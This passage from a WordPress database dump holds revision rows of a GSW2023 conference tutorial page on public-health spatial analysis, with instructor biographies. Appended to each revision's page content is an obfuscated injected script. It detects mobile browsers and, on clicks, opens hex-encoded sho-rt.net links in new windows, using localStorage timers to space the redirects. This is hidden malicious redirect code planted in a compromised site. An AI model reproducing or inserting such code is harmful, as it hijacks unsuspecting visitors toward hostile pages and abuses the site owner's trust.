Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-07 01:09:00','2023-02-07 01:09:00','',3681,'https://gsw2023.com/?p=3885',0,'revision','',0),
(3887,1,'2023-02-07 01:16:46','2023-02-07 01:16:46','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3699\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut4.jpg\" alt=\"\" width=\"74\" height=\"82\" /></p>\n<p>Dr. Priyanka Singh</p>\n<p>School of Computer Sciences, University of Petroleum &amp; Energy Studies, Dehradun, INDIA</p>\n<p><strong>ISPRS Secretary, WG IV/10</strong> Dr. Priyanka Singh is a Faculty of Computer Science in University of Petroleum and Energy Studies, India. She received her PhD in Data Science from IIT(ISM) and IIRS (ISRO), India in 2019. She received international and national awards in field of spatial sciences. Her research interests are Applied machine learning, WebGIS, citizen science, predictive analytics, geo-health and spatial modelling and analytics.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-3691\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg\" alt=\"\" width=\"79\" height=\"106\" /></p>\n<h5><strong>DR.Sameer Saran</strong></h5>\n<p>Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA</p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p><strong>ISPRS Chair, WG IV/10</strong></p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p>Dr. Sameer Saran is a Senior Scientist and Head, Geoinformatics Department at Indian Institute of Remote Sensing (ISRO). He is currently serving as Deputy General Secretary of AARS representing India. He has also served as Co-Chair for ISPRS TC V/3 working group on Geospatial Technology and Citizen Science for the year 2016-22.  His interest is Web GIS, spatial database &amp; modelling, citizen science, 3D city modelling &amp; geo-health.</p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph -->[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3694\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg\" alt=\"\" width=\"75\" height=\"95\" /></p>\n<p class=\"fancy-title entry-title start-animation-done start-animation\">Dr.Frank B Osei</p>\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong> Dr. F. B. Osei is a Faculty of Geo-Information Science and Earth Observation (ITC) in Department of Earth Observation Science (EOS), University of Twente, the Netherlands. He is editorial member of Spatial Statistics, Int. J. of Statistics in Medical Research, Geospatial Health, etc. His research interests are in GIS, geo-health, social sciences, life sciences, earth and environmental sciences.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3697\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut3.jpg\" alt=\"\" width=\"71\" height=\"79\" /></p>\n<p>Dr. Dilek KOC-SAN</p>\n<p>Department of Urban and Regional Planning, Akdeniz University, TURKEY</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong></p>\n<p>Dr. Dilek KOC-SAN is a</p>\n<p>Faculty of Architecture in Department of Urban and Regional Planning, Akdeniz University. In 2009, she received PhD degree from Middle East Technical University, Dept. of Geodetic &amp; Geographic Information Technologies. Her research interests are GIS, image classification &amp; processing, automatic object extraction &amp; multi-criteria decision analysis.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-07 01:16:46','2023-02-07 01:16:46','',3681,'https://gsw2023.com/?p=3887',0,'revision','',0),
(3888,1,'2023-02-07 01:22:31','2023-02-07 01:22:31','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-3691\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg\" alt=\"\" width=\"79\" height=\"106\" /></p>\n<h5><strong>DR.Sameer Saran</strong></h5>\n<p>Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA</p>\n<p><!-- /wp:paragraph --> <!-- wp:paragraph --><strong>ISPRS Chair, WG IV/10</strong></p>\n<p><!-- /wp:paragraph --> <!-- wp:paragraph -->Dr. Sameer Saran is a Senior Scientist and Head, Geoinformatics Department at Indian Institute of Remote Sensing (ISRO). He is currently serving as Deputy General Secretary of AARS representing India. He has also served as Co-Chair for ISPRS TC V/3 working group on Geospatial Technology and Citizen Science for the year 2016-22.  His interest is Web GIS, spatial database &amp; modelling, citizen science, 3D city modelling &amp; geo-health.</p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph -->[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3694\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg\" alt=\"\" width=\"75\" height=\"95\" /></p>\n<p class=\"fancy-title entry-title start-animation-done start-animation\">Dr.Frank B Osei</p>\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong> Dr. F. B. Osei is a Faculty of Geo-Information Science and Earth Observation (ITC) in Department of Earth Observation Science (EOS), University of Twente, the Netherlands. He is editorial member of Spatial Statistics, Int. J. of Statistics in Medical Research, Geospatial Health, etc. His research interests are in GIS, geo-health, social sciences, life sciences, earth and environmental sciences.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3697\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut3.jpg\" alt=\"\" width=\"71\" height=\"79\" /></p>\n<p>Dr. Dilek KOC-SAN</p>\n<p>Department of Urban and Regional Planning, Akdeniz University, TURKEY</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong></p>\n<p>Dr. Dilek KOC-SAN is a</p>\n<p>Faculty of Architecture in Department of Urban and Regional Planning, Akdeniz University. In 2009, she received PhD degree from Middle East Technical University, Dept. of Geodetic &amp; Geographic Information Technologies. Her research interests are GIS, image classification &amp; processing, automatic object extraction &amp; multi-criteria decision analysis.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3699\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut4.jpg\" alt=\"\" width=\"74\" height=\"82\" /></p>\n<p>Dr. Priyanka Singh</p>\n<p>School of Computer Sciences, University of Petroleum &amp; Energy Studies, Dehradun, INDIA</p>\n<p><strong>ISPRS Secretary, WG IV/10</strong> Dr. Priyanka Singh is a Faculty of Computer Science in University of Petroleum and Energy Studies, India. She received her PhD in Data Science from IIT(ISM) and IIRS (ISRO), India in 2019. She received international and national awards in field of spatial sciences. Her research interests are Applied machine learning, WebGIS, citizen science, predictive analytics, geo-health and spatial modelling and analytics.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 